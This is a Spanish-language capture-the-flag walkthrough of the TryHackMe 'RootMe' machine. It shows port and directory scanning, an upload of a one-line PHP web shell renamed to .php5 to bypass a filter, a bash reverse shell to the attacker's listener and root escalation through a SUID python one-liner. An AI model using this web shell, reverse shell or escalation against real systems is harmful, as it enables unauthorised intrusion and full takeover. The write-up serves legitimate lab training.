RootMe (SUID PYTHON)

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
|   256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_  256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HackIT - Home
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Buscaremos diretorios:

gobuster dir -u 10.10.34.175 -w /opt/SecLists/Discovery/Web-Content/common.txt

Ahora intentaremos colar un php pero no nos deja para ello le agregamos un php5 y puede ser otros mas php4 etc...

└─$ cat mira.php5 
<?php
system($_REQUEST['cmd']);
?>

Lo subimos y se agrego exitosamente y podemos agregar comandos

Ahora nos daremos una revershell

Cualquiera:

http://10.10.88.85/uploads/mira.php5?cmd=bash+-c+"bash+-i+>%26+/dev/tcp/10.9.0.60/443+0>%261"
Q 10.10.88.85/uploads/mira.php5?cmd=bash -c "bash -i>%26/dev/tcp/10.18.79.45/443 0>%261"
┌──(docker㉿docker)-[~/Tryhackme]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.9.0.60] from (UNKNOWN) [10.10.34.175] 43918
bash: cannot set terminal process group (925): Inappropriate ioctl for device
bash: no job control in this shell
www-data@rootme:/var/www/html/uploads$ ls

Cuando es www data tenemos que tratar que sea una tty para tener algo mas interactivo

script /dev/null -c bash
ctr + z 
stty raw -echo; fg 
reset xterm
*ESCALANDO BUSCANDO PERMISOS SUID SE ENCONTRO UN /usr/bin/python

www-data@rootme:/var/www$ find / -perm -4000 2>/dev/null | grep -i -v snap                                                                                                                                         
/usr/lib/dbus-1.0/dbus-daemon-launch-helper                                                                                                                                                                        
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic                                                                                                                                                                         
/usr/lib/eject/dmcrypt-get-device                                                                                                                                                                                  
/usr/lib/openssh/ssh-keysign                                                                                                                                                                                       
/usr/lib/policykit-1/polkit-agent-helper-1                                                                                                                                                                         
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/python
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
/bin/mount
/bin/su
/bin/fusermount
/bin/ping
/bin/umount
www-data@rootme:/var/www$

Con este comando explotanto el SUID python tendriamos root:

/usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
# ls
html  user.txt
# script /dev/null -c bash
Script started, file is /dev/null
www-data@rootme:/var/www$

Lo que hace este comando es darnos algo mas interectivo el root: script /dev/null -c bash

PreviousBasic Pentesting (SSH fuerza bruta)NextCTF simple (SUID VIM)

Last updated